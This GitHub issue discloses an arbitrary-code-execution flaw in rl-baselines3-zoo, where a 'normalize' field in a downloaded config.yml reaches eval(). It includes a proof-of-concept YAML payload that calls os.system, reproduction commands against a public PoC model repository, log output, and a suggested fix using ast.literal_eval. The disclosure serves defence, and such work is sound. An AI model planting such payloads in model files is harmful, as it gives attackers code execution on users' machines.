[Bug]: Potential remote code execution via normalize field from untrusted config.yml #505

@Vancir

🐛 Bug

Description
The rl-baselines3-zoo model loading pipeline parses config.yml files from downloaded model repositories and then passes the normalize field to eval() whenever that field is a string. Both steps happen in get_saved_hyperparams(), which runs when users download and load third-party model repositories.

config_file = os.path.join(stats_path, "config.yml")
if os.path.isfile(config_file):
    # Load saved hyperparameters
    with open(os.path.join(stats_path, "config.yml")) as f:
        hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)
    hyperparams["normalize"] = hyperparams.get("normalize", False)
else:
    obs_rms_path = os.path.join(stats_path, "obs_rms.pkl")
    hyperparams["normalize"] = os.path.isfile(obs_rms_path)
# Load normalization params
if hyperparams["normalize"]:
    if isinstance(hyperparams["normalize"], str):
        normalize_kwargs = eval(hyperparams["normalize"])

An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.

- - - batch_size
    - 256
  - - normalize
    - os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')

This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
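
One possible mitigation is sketched below, assuming that legitimate string values of normalize are plain Python dict literals such as "{'norm_obs': True, 'norm_reward': False}". The helper name parse_normalize_field is hypothetical and not part of rl_zoo3; it replaces eval() with ast.literal_eval(), which accepts only literals and rejects function calls. It does not address the yaml.UnsafeLoader call in the snippet above.

```python
import ast
from typing import Any


def parse_normalize_field(value: Any) -> tuple[bool, dict[str, Any]]:
    """Hypothetical helper: parse the `normalize` entry without eval().

    Returns (normalize_enabled, normalize_kwargs).
    Assumption: string values are dict literals holding keyword arguments.
    """
    if isinstance(value, bool):
        return value, {}
    if isinstance(value, str):
        try:
            # literal_eval only builds literals (dict, list, str, numbers, ...)
            # and raises on calls such as os.system(...).
            parsed = ast.literal_eval(value)
        except (ValueError, SyntaxError) as exc:
            raise ValueError(f"Refusing non-literal normalize value: {value!r}") from exc
        if not isinstance(parsed, dict) or not all(isinstance(k, str) for k in parsed):
            raise ValueError("normalize must be a dict literal with string keys")
        return True, parsed
    raise ValueError(f"Unsupported normalize type: {type(value).__name__}")


if __name__ == "__main__":
    print(parse_normalize_field("{'norm_obs': True, 'norm_reward': False}"))
    try:
        parse_normalize_field("os.system('echo hacked')")
    except ValueError as err:
        print("rejected:", err)
```

With this approach the payload from the proof of concept is rejected with a ValueError instead of being executed, while dict-literal values still parse.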

To Reproduce

I uploaded a proof-of-concept model repository to Hugging Face for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4

python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/

Running the commands above executes the attacker-controlled payload:

echo "You have been hacked!!!" && touch /tmp/hacked.txt

After execution, the file /tmp/hacked.txt is created, demonstrating successful arbitrary code execution.

Relevant log output / Error message

Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!

System Info

  • OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 # 89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
  • Python: 3.12.3
  • Stable-Baselines3: 2.8.0a2
  • PyTorch: 2.10.0+cu128
  • GPU Enabled: True
  • Numpy: 2.4.2
  • Cloudpickle: 3.1.2
  • Gymnasium: 1.2.3
  • OpenAI Gym: 0.26.2
